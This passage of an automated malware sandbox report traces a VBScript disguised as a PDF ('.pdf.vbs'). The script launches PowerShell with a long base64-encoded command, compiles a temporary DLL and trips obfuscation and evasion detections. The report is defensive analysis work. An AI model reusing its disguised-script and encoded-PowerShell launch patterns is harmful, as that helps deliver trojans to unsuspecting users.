QAaQBzAHAAdQAgAFMAaABvAHAAcABpAG4AZwBlACAAUgBFAFQASQAgAEQARQBPAFIAUwBVAE0AVgAgAGEAbABtAHUAIABHAHIAYQB2AGgAdQAgAEYAbwByAHMAZwA4ACAAVABIAEkAUg
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 18956
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 18956
    Source: doc_65398086_4190362045539.pdf.vbsInitial sample: Strings found which are bigger than 50
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A3A0F8
    Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 98%
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
    Source: doc_65398086_4190362045539.pdf.vbsVirustotal: Detection: 18%
    Source: doc_65398086_4190362045539.pdf.vbsReversingLabs: Detection: 19%
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\doc_65398086_4190362045539.pdf.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBJAG4AcwB0AHIAdQA5ACAAUwBCAEUAVQBSAFQARQBSAE4ARQAgAFMAbABhAG4AIABTAHAAbwBuAHQAYQBuADcAIABVAE4AQwBBAEwATAAgAGUAbQBiAG8AIAByAGUAaQB0ACAAVABhAHIAcABhAHAAZQAgAHUAZwBpAGYAdABlAHMAZAAgAEIAQQBDAEsAUwBUAEEASQBSACAAZQBnAG8AaQB0AHkAaAAgAFMAbQBlAGQAIABVAFIATwBHAEUATgAgAHYAYQBzAG8AcgByAGgAYQBwACAAQQBtAGUAdAByAG8AIABQAEEAUgBBAFAASABSAEEAUwBUACAASwByAHkAbQBtAGUAbABsAG8AYwAyACAASQBOAFQARQBSAFMAUABJAFIAIABVAG4AcwBxAHUAZQA2ACAAagBhAGMAbwBiAGkAdABpAHMAIABQAEgATwBOAE8AUABIACAAQQBiAHMAYwBvAG4AZABlAHIAcwA3ACAAQwBoAGkAawBpAHQAYQBvAHAAcwAgAFMASwBZAEcARwAgAEQATwBNAE0ARQBEAEEARwBTACAAbgBvAG4AYQBzAHMAaQBzAHQAYQAgAEEAcgBjAGgAYwBoAGUAIAB0AHYAaQB2ACAASwBhAHAAcgBpAGYAbwBsAGkAIABGAGkAbgBhAG4AcwB0AGkAIAANAAoAIwBUAHIAaQBwAHAAZQB0AHMAIABNAGwAawBlADIAIABuAG8AbgBlAHgAcABsAG8AcgAgAEYATwBMAEsARQBDAEUAIABBAHIAdgBlAGYAbABnAGUAIABGAEEAUwBUAFAAUgBJAFMAUwBZACAASABvAGcAZwB3ADYAIABSAGUAcABlAHQANAAgAEgAQQBMAFYATwBOAEsATABFACAAQQByAGIAZQBqAGQAcwAgAFAATABPAFQAVABFAFIAIABUAHMAZQBkACAADQAKACMARAB5AG4AYQBtAGkAawBrAGUAbgA3ACAAUwBUAEsAWQBTAFQAVAAgAEgAeQBkAHIAbwBuAGkAdAA1ACAAcgBlAGQAaQBzAHQAcgBpACAAbQBlAHIAaQBjAGEAcgAgAHYAaQBwAHAAIABGAGEAYgByADEAIABGAEwATwBWAE0AQQAgAEEAQQBOAEQAUwBIAE8AIABTAHQAYQBhAGwAcwB0AHUAIABKAEUAUwBVAEkAIABUAGEAbgBhACAAQwBvAG0AbQBvACAARwB1AGEAcABpAG4AbwAgAFMAeQBuAGsAcgBvAG4ANwAgAGQAZQB2AGwAaQBuAHIAZQB0ACAATwBtAHMAdABuAGkAbgBnAHMAZwAgAFIAZQBzAGUAMgAgAG0AZQB0AHIAbwBsAG8AIABTAFUARwBFAE4ARQBLAEQAQgBPACAAUwB2AGkAcgBwAGUAdABzAHUAbQAxACAAaAB5AGQAcgBhAHQAZQByACAATwBCAFMARQBSAFYAQQAgAFQARQBNAFAAQQBOAEEAIABWAEkASwBJAE4ARwBFAFIAIAB1AHAAcgBpAHYAZQBlAGsAcwAgAGgAZQBhAHIAdABiACAARQBtAGIAZQBkACAAVQBOAEEAUwBTAEUATgAgAE8AUABLAEwAQQAgAGUAZQBiAHIAZQBlAHIAZQAgAFAAaQBjAHIAaQB0AGkAYwAzACAADQAKACMARQBFAEwASQBFAFMAVAAgAEMAcgB5AHMAdABhAGwAbwBnADEAIABEAFUAUwBJAE4ATQBFACAASQBuAGQAaQB2ADgAIAB1AGQAcwBrAHIAaQBmAHQAcwBwACAAVABlAGsAbgBvAGsAcgBhADEAIAB0AHkAbgBkAHQAZgAgAEUAbABlAHYAdABpAG0AZQA2ACAAZAB5AGsAcwB2ACAAYgBvAG4AYgBvAG4AZQByAHMAIABhAG4AdABpAGMAYQBwAGkAdAAgAHUAbgBkAGUAcgAgAHYAaQBlAHIAIABZAEQARQBSAFAAIABLAGwAYgBlAGIAYQBhAG4AZAA5ACAAVgBpAHAAcwB0ADQAIABNAGEAeABpAG0AbwBuACAAQQBwAHAAcgBhAGkAcwBlADQAIABBAFIAVABJAEcARQBSACAADQAKACMAVQBEAFMASwBSAEkARABOACAAegBpAHQAYQBzACAAcwBwAGEAbgBrACAAVABpAHAAcABlAHIAaABvADYAIABzAGMAcgBvAGwAIABGAG4AaQBzAHIAIABGAFIAQQBTAEkARwBFACAAZABpAGUAdABpAGMAaQBhACAAaABhAGEAbgAgAFMAcABhAGEAbQBuAGQAcwAxACAAcwBlAHIAdgBpACAATABlAGQAcwBhAGcAZQBtAHUAIABVAG4AZABlAHIAawBlAG4AZAB0ADcAIABTAGEAbgBkAHAANAAgAGsAYQBwAHMAbABlAHIAYgBhAHMAIABkAGkAcwByACAAUABSAE8AUAAgAHIAbwBzAHMAZQAgAEYAbwByAGsAbABhADkAIAANAAoAIwBUAHIAYQBuAHMAaQBzAHQAbwByADEAIABXAEEAUgBEACAARABvAG0AcwBmAG8AMwAgAEIAQQBKAEEARABTAEUATgAgAEsAQQBSAEEASwBUAEUAUgBCACAAYwBoAGwAbwAgAEkAcwBvAGMAIABPAHIAbwBuAHQAaQB1AG0AMwAgAEUAcQB1AGkAcABwAGUANwAgAEUAcABpAGcAcgBhAG0AcgAgAE0AYQB0AHQAaQBzAHAAdQAgAFMAaABvAHAAcABpAG4AZwBlACAAUgBFAFQASQAgAEQARQBPAFIAUwBVAE0AVgAgAGEAbABtAHUAIABHAHIAYQB2AGgAdQAgAEYAbwByAHMAZwA4ACAAVABIAEkAUg
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBAD5.tmp" "c:\Users\user\AppData\Local\Temp\wwh3pdnv\CSC196797DCDE8F47A0A151AAD0920D1B.TMP"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBJAG4AcwB0AHIAdQA5ACAAUwBCAEUAVQBSAFQARQBSAE4ARQAgAFMAbABhAG4AIABTAHAAbwBuAHQAYQBuADcAIABVAE4AQwBBAEwATAAgAGUAbQBiAG8AIAByAGUAaQB0ACAAVABhAHIAcABhAHAAZQAgAHUAZwBpAGYAdABlAHMAZAAgAEIAQQBDAEsAUwBUAEEASQBSACAAZQBnAG8AaQB0AHkAaAAgAFMAbQBlAGQAIABVAFIATwBHAEUATgAgAHYAYQBzAG8AcgByAGgAYQBwACAAQQBtAGUAdAByAG8AIABQAEEAUgBBAFAASABSAEEAUwBUACAASwByAHkAbQBtAGUAbABsAG8AYwAyACAASQBOAFQARQBSAFMAUABJAFIAIABVAG4AcwBxAHUAZQA2ACAAagBhAGMAbwBiAGkAdABpAHMAIABQAEgATwBOAE8AUABIACAAQQBiAHMAYwBvAG4AZABlAHIAcwA3ACAAQwBoAGkAawBpAHQAYQBvAHAAcwAgAFMASwBZAEcARwAgAEQATwBNAE0ARQBEAEEARwBTACAAbgBvAG4AYQBzAHMAaQBzAHQAYQAgAEEAcgBjAGgAYwBoAGUAIAB0AHYAaQB2ACAASwBhAHAAcgBpAGYAbwBsAGkAIABGAGkAbgBhAG4AcwB0AGkAIAANAAoAIwBUAHIAaQBwAHAAZQB0AHMAIABNAGwAawBlADIAIABuAG8AbgBlAHgAcABsAG8AcgAgAEYATwBMAEsARQBDAEUAIABBAHIAdgBlAGYAbABnAGUAIABGAEEAUwBUAFAAUgBJAFMAUwBZACAASABvAGcAZwB3ADYAIABSAGUAcABlAHQANAAgAEgAQQBMAFYATwBOAEsATABFACAAQQByAGIAZQBqAGQAcwAgAFAATABPAFQAVABFAFIAIABUAHMAZQBkACAADQAKACMARAB5AG4AYQBtAGkAawBrAGUAbgA3ACAAUwBUAEsAWQBTAFQAVAAgAEgAeQBkAHIAbwBuAGkAdAA1ACAAcgBlAGQAaQBzAHQAcgBpACAAbQBlAHIAaQBjAGEAcgAgAHYAaQBwAHAAIABGAGEAYgByADEAIABGAEwATwBWAE0AQQAgAEEAQQBOAEQAUwBIAE8AIABTAHQAYQBhAGwAcwB0AHUAIABKAEUAUwBVAEkAIABUAGEAbgBhACAAQwBvAG0AbQBvACAARwB1AGEAcABpAG4AbwAgAFMAeQBuAGsAcgBvAG4ANwAgAGQAZQB2AGwAaQBuAHIAZQB0ACAATwBtAHMAdABuAGkAbgBnAHMAZwAgAFIAZQBzAGUAMgAgAG0AZQB0AHIAbwBsAG8AIABTAFUARwBFAE4ARQBLAEQAQgBPACAAUwB2AGkAcgBwAGUAdABzAHUAbQAxACAAaAB5AGQAcgBhAHQAZQByACAATwBCAFMARQBSAFYAQQAgAFQARQBNAFAAQQBOAEEAIABWAEkASwBJAE4ARwBFAFIAIAB1AHAAcgBpAHYAZQBlAGsAcwAgAGgAZQBhAHIAdABiACAARQBtAGIAZQBkACAAVQBOAEEAUwBTAEUATgAgAE8AUABLAEwAQQAgAGUAZQBiAHIAZQBlAHIAZQAgAFAAaQBjAHIAaQB0AGkAYwAzACAADQAKACMARQBFAEwASQBFAFMAVAAgAEMAcgB5AHMAdABhAGwAbwBnADEAIABEAFUAUwBJAE4ATQBFACAASQBuAGQAaQB2ADgAIAB1AGQAcwBrAHIAaQBmAHQAcwBwACAAVABlAGsAbgBvAGsAcgBhADEAIAB0AHkAbgBkAHQAZgAgAEUAbABlAHYAdABpAG0AZQA2ACAAZAB5AGsAcwB2ACAAYgBvAG4AYgBvAG4AZQByAHMAIABhAG4AdABpAGMAYQBwAGkAdAAgAHUAbgBkAGUAcgAgAHYAaQBlAHIAIABZAEQARQBSAFAAIABLAGwAYgBlAGIAYQBhAG4AZAA5ACAAVgBpAHAAcwB0ADQAIABNAGEAeABpAG0AbwBuACAAQQBwAHAAcgBhAGkAcwBlADQAIABBAFIAVABJAEcARQBSACAADQAKACMAVQBEAFMASwBSAEkARABOACAAegBpAHQAYQBzACAAcwBwAGEAbgBrACAAVABpAHAAcABlAHIAaABvADYAIABzAGMAcgBvAGwAIABGAG4AaQBzAHIAIABGAFIAQQBTAEkARwBFACAAZABpAGUAdABpAGMAaQBhACAAaABhAGEAbgAgAFMAcABhAGEAbQBuAGQAcwAxACAAcwBlAHIAdgBpACAATABlAGQAcwBhAGcAZQBtAHUAIABVAG4AZABlAHIAawBlAG4AZAB0ADcAIABTAGEAbgBkAHAANAAgAGsAYQBwAHMAbABlAHIAYgBhAHMAIABkAGkAcwByACAAUABSAE8AUAAgAHIAbwBzAHMAZQAgAEYAbwByAGsAbABhADkAIAANAAoAIwBUAHIAYQBuAHMAaQBzAHQAbwByADEAIABXAEEAUgBEACAARABvAG0AcwBmAG8AMwAgAEIAQQBKAEEARABTAEUATgAgAEsAQQBSAEEASwBUAEUAUgBCACAAYwBoAGwAbwAgAEkAcwBvAGMAIABPAHIAbwBuAHQAaQB1AG0AMwAgAEUAcQB1AGkAcABwAGUANwAgAEUAcABpAGcAcgBhAG0AcgAgAE0AYQB0AHQAaQBzAHAAdQAgAFMAaABvAHAAcABpAG4AZwBlACAAUgBFAFQASQAgAEQARQBPAFIAUwBVAE0AVgAgAGEAbABtAHUAIABHAHIAYQB2AGgAdQAgAEYAbwByAHMAZwA4ACAAVABIAEkAUg
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBAD5.tmp" "c:\Users\user\AppData\Local\Temp\wwh3pdnv\CSC196797DCDE8F47A0A151AAD0920D1B.TMP"
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:640:120:WilError_01
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\doc_65398086_4190362045539.pdf.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220512Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user~1\AppData\Local\Temp\rettetast.datJump to behavior
    Source: classification engineClassification label: mal88.troj.evad.winVBS@8/9@0/0
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: Binary string: k;C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.pdb source: powershell.exe, 0000000E.00000002.887326067.0000000004919000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 0000000E.00000002.894432907.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A3564A push eax; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A39E70 push eax; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07A31DBE push esi; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.dllJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: Possible double extension: pdf.vbsStatic PE information: doc_65398086_4190362045539.pdf.vbs
    Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
